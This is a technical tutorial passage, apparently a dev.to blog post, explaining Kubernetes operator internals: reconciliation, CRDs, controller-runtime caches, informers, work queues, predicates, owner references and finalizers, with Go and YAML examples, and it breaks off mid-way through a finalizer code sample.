&lt;p&gt;Controllers are &lt;em&gt;implemented on top of event streams&lt;/em&gt; (watch events from the Kubernetes API), but their reconciliation logic is &lt;strong&gt;level-based, not edge-triggered&lt;/strong&gt;. The trigger is event-driven; the behavior is not. Rather than reacting once to a specific event, the controller always asks "is the world in the state I want?" and drives toward that state regardless of how many events fired. This distinction matters enormously for resilience: if you miss an event, the next reconciliation catches it anyway. Contrast this with a purely edge-triggered system where a missed event means a missed action — permanently.&lt;/p&gt;
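&lt;p&gt;The level-based idea can be shown in a few lines. This is an illustrative sketch, not controller-runtime code: the reconciler never inspects which event woke it, it only compares desired against observed and nudges the world one step closer, so missed or coalesced events are harmless.&lt;/p&gt;

```go
// Level-based reconciliation in miniature: each pass asks "what is the
// state now?" and converges, regardless of how many events fired or were
// lost along the way.
package main

import "fmt"

type world struct {
	desired, observed int // e.g. replica counts
}

// reconcile drives observed toward desired by one step and reports
// whether the states now match.
func reconcile(w *world) (done bool) {
	switch {
	case w.observed < w.desired:
		w.observed++ // create one replica
	case w.observed > w.desired:
		w.observed-- // delete one replica
	}
	return w.observed == w.desired
}

func main() {
	w := &world{desired: 3, observed: 0}
	// However the loop is triggered, repeated passes converge.
	for !reconcile(w) {
	}
	fmt.Printf("converged: %d/%d replicas\n", w.observed, w.desired)
}
```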





&lt;h2&gt;
  
  
  Kubernetes API Machinery: The Backbone
&lt;/h2&gt;

&lt;p&gt;Before building or understanding operators, you need a solid mental model of how the Kubernetes API server works.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1egh0suv8i9m4d30v0og.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1egh0suv8i9m4d30v0og.png" alt="image" width="444" height="2049"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Every object in Kubernetes is stored in &lt;strong&gt;etcd&lt;/strong&gt; as a versioned, typed resource. The API server exposes these objects via a RESTful interface. Critically, the API server supports a &lt;strong&gt;Watch&lt;/strong&gt; mechanism — clients can subscribe to a stream of events for any resource type.&lt;/p&gt;

&lt;p&gt;The watch stream delivers three event types: &lt;code&gt;ADDED&lt;/code&gt;, &lt;code&gt;MODIFIED&lt;/code&gt;, &lt;code&gt;DELETED&lt;/code&gt;. These are the raw signals your controller eventually acts on, though — as we'll see — the controller runtime abstracts this considerably.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Resource Versions&lt;/strong&gt; are central to the concurrency model. Every object has a &lt;code&gt;resourceVersion&lt;/code&gt; field — an opaque string used for optimistic concurrency control. It is derived from etcd's internal revision mechanism, but clients must always treat it as opaque: never parse it, compare it numerically, or make assumptions about its format. When you update an object, you must send the current &lt;code&gt;resourceVersion&lt;/code&gt; to guarantee a compare-and-swap, preventing lost updates in concurrent environments.&lt;/p&gt;
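&lt;p&gt;The compare-and-swap semantics can be modeled in memory. This toy sketch is not client-go or API server code (and it uses a numeric version purely for convenience, which real clients must never do): it only shows why a write carrying a stale &lt;code&gt;resourceVersion&lt;/code&gt; is rejected instead of silently overwriting a concurrent update.&lt;/p&gt;

```go
// Toy model of optimistic concurrency: an update succeeds only when the
// caller's copy carries the current resourceVersion, mirroring a PUT
// against the Kubernetes API server.
package main

import (
	"errors"
	"fmt"
)

var errConflict = errors.New("409 Conflict: resourceVersion mismatch")

type object struct {
	resourceVersion int // opaque to real clients; numeric only in this toy
	spec            string
}

type store struct{ obj object }

func (s *store) update(o object) error {
	if o.resourceVersion != s.obj.resourceVersion {
		return errConflict // the object changed under the caller
	}
	o.resourceVersion++
	s.obj = o
	return nil
}

func main() {
	s := &store{obj: object{resourceVersion: 1, spec: "a"}}
	staleCopy := s.obj // client A reads
	freshCopy := s.obj // client B reads
	freshCopy.spec = "b"
	s.update(freshCopy) // B wins the race; version advances
	staleCopy.spec = "c"
	fmt.Println(s.update(staleCopy)) // A must re-read and retry
}
```

&lt;p&gt;The standard client-side response to a conflict is to re-fetch the object and re-apply the mutation, which is exactly the retry-on-conflict pattern client-go provides.&lt;/p&gt;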





&lt;h2&gt;
  
  
  Custom Resource Definitions
&lt;/h2&gt;

&lt;p&gt;CRDs are how you extend the Kubernetes API. When you apply a CRD, the API server dynamically registers new API endpoints, enables storage in etcd, and starts serving your custom resources as first-class API objects.&lt;/p&gt;

&lt;p&gt;A CRD has several important structural components:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;apiextensions.k8s.io/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CustomResourceDefinition&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;databases.mycompany.io&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;group&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;mycompany.io&lt;/span&gt;
  &lt;span class="na"&gt;names&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Database&lt;/span&gt;
    &lt;span class="na"&gt;plural&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;databases&lt;/span&gt;
    &lt;span class="na"&gt;singular&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;database&lt;/span&gt;
    &lt;span class="na"&gt;shortNames&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;db"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
  &lt;span class="na"&gt;scope&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Namespaced&lt;/span&gt;
  &lt;span class="na"&gt;versions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1alpha1&lt;/span&gt;
      &lt;span class="na"&gt;served&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="na"&gt;storage&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="na"&gt;schema&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;openAPIV3Schema&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="c1"&gt;# Structural schema for validation&lt;/span&gt;
      &lt;span class="na"&gt;subresources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt;           &lt;span class="c1"&gt;# Enables /status subresource&lt;/span&gt;
        &lt;span class="na"&gt;scale&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;               &lt;span class="c1"&gt;# Optional: enables /scale subresource&lt;/span&gt;
          &lt;span class="na"&gt;specReplicasPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.spec.replicas&lt;/span&gt;
          &lt;span class="na"&gt;statusReplicasPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.status.replicas&lt;/span&gt;
      &lt;span class="na"&gt;additionalPrinterColumns&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Phase&lt;/span&gt;
          &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;string&lt;/span&gt;
          &lt;span class="na"&gt;jsonPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.status.phase&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;The &lt;code&gt;status&lt;/code&gt; subresource&lt;/strong&gt; deserves special attention. When enabled, &lt;code&gt;spec&lt;/code&gt; and &lt;code&gt;status&lt;/code&gt; become separately updatable — meaning only the controller should write to &lt;code&gt;status&lt;/code&gt;, and users should only write to &lt;code&gt;spec&lt;/code&gt;. This enforces a clean separation of intent vs. observation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Structural Schema&lt;/strong&gt; is mandatory since &lt;code&gt;apiextensions.k8s.io/v1&lt;/code&gt; (Kubernetes 1.16+). Non-structural schemas are rejected by the API server. The &lt;code&gt;openAPIV3Schema&lt;/code&gt; field defines the shape of your resource and enables server-side validation — every field must be described. This prevents garbage data from entering your system.&lt;/p&gt;





&lt;h2&gt;
  
  
  The Controller Runtime: Inside the Engine
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;controller-runtime&lt;/code&gt; library (used by both Kubebuilder and Operator SDK) provides the scaffolding that most operators are built on. Let's dissect what it gives you.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F90iiw0s6l08fwhdbo3g4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F90iiw0s6l08fwhdbo3g4.png" alt="image" width="800" height="342"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Manager&lt;/strong&gt; is the top-level orchestrator. It:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Manages a shared &lt;strong&gt;cache&lt;/strong&gt; (backed by informers) for all resource types your controllers care about&lt;/li&gt;
&lt;li&gt;Provides a &lt;strong&gt;client&lt;/strong&gt; that reads from the local cache and writes directly to the API server&lt;/li&gt;
&lt;li&gt;Runs all controllers in goroutines&lt;/li&gt;
&lt;li&gt;Handles leader election&lt;/li&gt;
&lt;li&gt;Exposes health check and metrics endpoints&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Cache&lt;/strong&gt; is the performance secret. Rather than every reconciliation hitting the API server, reads go to a local in-memory store that is kept in sync via informers. This reduces API server load dramatically and makes your operator fast.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Client&lt;/strong&gt; has two personalities:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Reader&lt;/strong&gt; (cache-backed): Fast, eventually consistent. Used for &lt;code&gt;Get&lt;/code&gt; and &lt;code&gt;List&lt;/code&gt; operations during reconciliation. If you need strong consistency at a specific checkpoint, you can bypass the cache by constructing an uncached client — but do so sparingly, as it adds latency and API server load.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Writer&lt;/strong&gt; (direct to API): Used for &lt;code&gt;Create&lt;/code&gt;, &lt;code&gt;Update&lt;/code&gt;, &lt;code&gt;Patch&lt;/code&gt;, &lt;code&gt;Delete&lt;/code&gt;, and &lt;code&gt;Status().Update()&lt;/code&gt;. These always go directly to the API server, never through the cache.&lt;/li&gt;
&lt;/ul&gt;





&lt;h2&gt;
  
  
  Informers, Listers, and the Cache
&lt;/h2&gt;

&lt;p&gt;This is where things get really interesting from an internals perspective. The &lt;strong&gt;Informer&lt;/strong&gt; is the heart of the watch machinery.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffyzb8t6tuye3ykpfy3xh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffyzb8t6tuye3ykpfy3xh.png" alt="image" width="800" height="482"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;Reflector&lt;/strong&gt; does the heavy lifting: it first performs a &lt;code&gt;List&lt;/code&gt; to establish the initial state, then starts a long-lived &lt;code&gt;Watch&lt;/code&gt;. If the watch connection drops (network blip, API server restart), the reflector automatically reconnects and re-lists if necessary.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;DeltaFIFO&lt;/strong&gt; queue is a clever data structure that deduplicates events for the same object. If an object is modified 10 times before the controller gets around to processing it, those events are collapsed. This is the first layer of the "level-triggered" behavior.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;Local Cache&lt;/strong&gt; (a thread-safe store with indexes) is what &lt;code&gt;client.Get&lt;/code&gt; and &lt;code&gt;client.List&lt;/code&gt; read from. It's always slightly behind the API server (eventual consistency), but that's acceptable because your reconciler should be idempotent anyway.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Listers&lt;/strong&gt; are typed wrappers over the cache that let you query by namespace or label selector without hitting the network.&lt;/p&gt;





&lt;h2&gt;
  
  
  The Reconciliation Loop in Depth
&lt;/h2&gt;

&lt;p&gt;Here's the full picture of what happens from a watch event to a completed reconciliation:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb0lal7wbgdaimwa1qyl8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb0lal7wbgdaimwa1qyl8.png" alt="image" width="800" height="1821"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A few nuances that trip people up:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The key is a namespace/name pair, not an object.&lt;/strong&gt; When your reconciler is called, you only get the namespace and name. You must re-fetch the current state of the object from the cache. Never trust stale data passed in — always re-read at the top of your reconcile function.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reconcile should be idempotent.&lt;/strong&gt; It will be called multiple times for the same state. If you create a resource, check if it already exists first. If you apply a configuration, make it declarative. A reconcile that is accidentally destructive when called twice is a ticking time bomb.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Errors vs. Requeue.&lt;/strong&gt; Returning an &lt;code&gt;error&lt;/code&gt; causes the item to be requeued with exponential backoff (respecting the rate limiter). Returning &lt;code&gt;ctrl.Result{Requeue: true}&lt;/code&gt; or &lt;code&gt;ctrl.Result{RequeueAfter: duration}&lt;/code&gt; requeues without registering an error (no backoff increment). Use the former for actual errors, the latter for polling scenarios.&lt;/p&gt;





&lt;h2&gt;
  
  
  Work Queues and Rate Limiting
&lt;/h2&gt;

&lt;p&gt;The work queue deserves its own section because it's where many operator performance issues originate.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0op5pacqxl2qx3w5q7vs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0op5pacqxl2qx3w5q7vs.png" alt="image" width="800" height="227"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The work queue has a built-in &lt;strong&gt;deduplication&lt;/strong&gt; guarantee: if the same namespace/name is already in the queue, adding it again is a no-op. This means a burst of 100 events for the same object results in exactly one reconciliation.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;Processing Set&lt;/strong&gt; ensures that while an item is being reconciled, any new events for that same item are queued but not dispatched until the current reconciliation completes. This prevents concurrent reconciliations for the same object.&lt;/p&gt;
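&lt;p&gt;These two guarantees can be captured in a small sketch. It mirrors the &lt;em&gt;semantics&lt;/em&gt; of client-go's work queue (deduplication plus a processing set with a dirty flag), not its actual implementation, and it omits the real queue's locking.&lt;/p&gt;

```go
// Work queue semantics in miniature: duplicate adds collapse, and an item
// being reconciled is parked until Done, then re-enqueued exactly once.
package main

import "fmt"

type key string

type workQueue struct {
	queue      []key
	queued     map[key]bool // in the queue, waiting for dispatch
	processing map[key]bool // handed to a worker, not yet Done
	dirty      map[key]bool // re-added while processing
}

func newWorkQueue() *workQueue {
	return &workQueue{
		queued:     map[key]bool{},
		processing: map[key]bool{},
		dirty:      map[key]bool{},
	}
}

func (q *workQueue) Add(k key) {
	if q.processing[k] {
		q.dirty[k] = true // park it; re-enqueue on Done
		return
	}
	if q.queued[k] {
		return // dedup: already waiting
	}
	q.queued[k] = true
	q.queue = append(q.queue, k)
}

func (q *workQueue) Get() (key, bool) {
	if len(q.queue) == 0 {
		return "", false
	}
	k := q.queue[0]
	q.queue = q.queue[1:]
	delete(q.queued, k)
	q.processing[k] = true
	return k, true
}

func (q *workQueue) Done(k key) {
	delete(q.processing, k)
	if q.dirty[k] {
		delete(q.dirty, k)
		q.Add(k) // events that arrived mid-reconcile trigger one more pass
	}
}

func main() {
	q := newWorkQueue()
	q.Add("default/db-1")
	q.Add("default/db-1") // collapsed with the first add
	k, _ := q.Get()
	q.Add(k) // arrives during reconcile: parked, not dispatched
	q.Done(k)
	fmt.Println("pending after Done:", len(q.queue))
}
```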

&lt;p&gt;&lt;strong&gt;Rate limiters&lt;/strong&gt; in controller-runtime compose two strategies:&lt;/p&gt;

&lt;p&gt;The &lt;em&gt;ItemExponentialFailureRateLimiter&lt;/em&gt; tracks per-item failure counts and applies backoff: &lt;code&gt;base * 2^failures&lt;/code&gt; up to a maximum. This prevents a persistently failing object from hammering the API server.&lt;/p&gt;

&lt;p&gt;The &lt;em&gt;BucketRateLimiter&lt;/em&gt; is a global token bucket that caps overall reconciliation throughput. This protects the API server from a thundering herd when many objects need reconciliation simultaneously (e.g., after an operator restart).&lt;/p&gt;

&lt;p&gt;The default controller-runtime rate limiter combines per-item exponential backoff (base ~5ms, max ~1000s) with a global token bucket (~10 QPS, burst ~100). These defaults can vary across controller-runtime versions and are not guaranteed API contracts — always verify against your version's source. In high-scale environments, you'll almost certainly want to tune them.&lt;/p&gt;





&lt;h2&gt;
  
  
  Watches, Events, and Predicates
&lt;/h2&gt;

&lt;p&gt;A controller needs to know which objects to watch. The &lt;code&gt;.Watches()&lt;/code&gt; builder in controller-runtime lets you express complex watch topologies.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh528v7qiytm1chkew34x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh528v7qiytm1chkew34x.png" alt="image" width="800" height="508"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;EnqueueRequestForOwner&lt;/strong&gt; is the most common pattern: when a child resource changes (e.g., a Pod owned by your operator's StatefulSet), find the owner reference chain and enqueue the root owner. This lets the parent controller react to child state changes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;EnqueueRequestsFromMapFunc&lt;/strong&gt; is a powerful escape hatch. Given any object event, you provide a function that maps it to zero or more reconcile requests. Use this for non-ownership relationships — e.g., when a shared Secret changes, enqueue every custom resource that references it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Predicates&lt;/strong&gt; filter events before they hit the queue. This is a critical optimization that's often overlooked:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;// Only reconcile when spec changes, not on every status update&lt;/span&gt;
&lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NewControllerManagedBy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;mgr&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;
    &lt;span class="n"&gt;For&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt;
        &lt;span class="n"&gt;builder&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;WithPredicates&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;predicate&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GenerationChangedPredicate&lt;/span&gt;&lt;span class="p"&gt;{}))&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;
    &lt;span class="n"&gt;Complete&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;GenerationChangedPredicate&lt;/code&gt; is particularly valuable — it only triggers reconciliation when &lt;code&gt;metadata.generation&lt;/code&gt; increments (which only happens on spec changes), ignoring pure status updates. Without this, every status write your controller does triggers another reconciliation, creating a tight loop.&lt;/p&gt;
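&lt;p&gt;The predicate's core test is a one-line comparison of the old and new object's generation. A toy model with simplified stand-in types (real predicates operate on &lt;code&gt;client.Object&lt;/code&gt; events):&lt;/p&gt;

```go
package main

import "fmt"

// Simplified stand-in for a Kubernetes object's relevant fields.
type object struct {
	Generation int64 // bumped by the API server on spec changes only
	Phase      string
}

// generationChanged models GenerationChangedPredicate's update filter:
// an update event passes only when metadata.generation changed.
func generationChanged(oldObj, newObj object) bool {
	return oldObj.Generation != newObj.Generation
}

func main() {
	current := object{Generation: 4, Phase: "Running"}

	statusOnly := object{Generation: 4, Phase: "Degraded"} // status write
	specChange := object{Generation: 5, Phase: "Running"}  // spec edit

	fmt.Println(generationChanged(current, statusOnly)) // false, filtered out
	fmt.Println(generationChanged(current, specChange)) // true, reconcile
}
```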





&lt;h2&gt;
  
  
  Ownership, Finalizers, and Garbage Collection
&lt;/h2&gt;

&lt;p&gt;This triad is where operator bugs tend to cluster. Let's be precise.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Owner References&lt;/strong&gt; establish the parent-child relationship for garbage collection:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjncia8yvcr1qo6r0c0yo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjncia8yvcr1qo6r0c0yo.png" alt="image" width="800" height="241"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Finalizer deletion flow&lt;/strong&gt; — what happens step by step when a user deletes an object with a finalizer:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdl2mcz6av4fvyktp5lz1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdl2mcz6av4fvyktp5lz1.png" alt="image" width="537" height="1804"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Owner references tell the Kubernetes garbage collector that child objects should be deleted when the parent is deleted. Always set owner references on resources you create — without them, orphaned resources accumulate in the cluster. Note that cross-namespace owner references are disallowed: the owner must live in the same namespace as the child, or be cluster-scoped.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SetControllerReference&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;database&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;statefulSet&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Scheme&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This sets the child's &lt;code&gt;metadata.ownerReferences&lt;/code&gt; to point to the parent, with &lt;code&gt;controller: true&lt;/code&gt; and &lt;code&gt;blockOwnerDeletion: true&lt;/code&gt;.&lt;/p&gt;
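&lt;p&gt;On the child object, the result looks roughly like this (the group/version and names are illustrative for the &lt;code&gt;Database&lt;/code&gt; example; the &lt;code&gt;uid&lt;/code&gt; is the parent's actual UID):&lt;/p&gt;

```yaml
metadata:
  ownerReferences:
    - apiVersion: mycompany.io/v1   # hypothetical group/version
      kind: Database
      name: my-database             # hypothetical parent name
      uid: 0a1b2c3d-...             # the parent's UID, set by the API server
      controller: true
      blockOwnerDeletion: true
```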

&lt;p&gt;&lt;strong&gt;Finalizers&lt;/strong&gt; are strings in &lt;code&gt;metadata.finalizers&lt;/code&gt; that prevent an object from being deleted until all finalizers are removed. When a user deletes an object with finalizers, Kubernetes sets &lt;code&gt;metadata.deletionTimestamp&lt;/code&gt; but doesn't remove the object. Your controller must detect this, do cleanup work, remove its finalizer, and then update the object — at which point Kubernetes deletes it.&lt;/p&gt;

&lt;p&gt;Common finalizer pattern:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="n"&gt;myFinalizer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"mycompany.io/database-finalizer"&lt;/span&gt;

&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Reconciler&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;Reconcile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Request&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
